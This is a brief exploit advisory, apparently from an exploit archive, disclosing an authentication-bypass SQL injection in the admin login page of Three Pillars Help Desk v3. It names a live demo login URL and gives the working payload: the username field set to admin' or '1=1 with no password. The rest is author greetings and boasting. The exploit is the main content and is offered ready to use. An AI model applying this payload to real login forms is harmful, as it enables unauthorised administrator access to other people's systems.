id: 5766
date: 09/14/2009
title: Three Pillars Help Desk v3 (Auth Bypass) SQL Injection Vulnerability
author: Snakespc
cves: 

====================================================================
Three Pillars Help Desk v3 (Auth Bypass) SQL Injection Vulnerability
====================================================================



#--------------------------------------------------------
#Help Desk Version 3 (Auth Bypass) Remote Sql Injection
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#-------------------------------------------------------
#
#Script:Help Desk Version 3
#
#http://www.threepillarshelpdesk.com/
#--------------------------------------------------------
#Exploit:
#--------
#Demo:http://www.threepillarshelpdesk.com/demo/admin/login.php
#Username:admin' or '1=1 
#Password: No Thing !!!!
----------------------------------------------------------
Note:His0k4 Saha Ftooooork .....RANI TWAHCHTEK BZAFFFFFFFFFFFF 




#  0day.today [2023-03-24]  #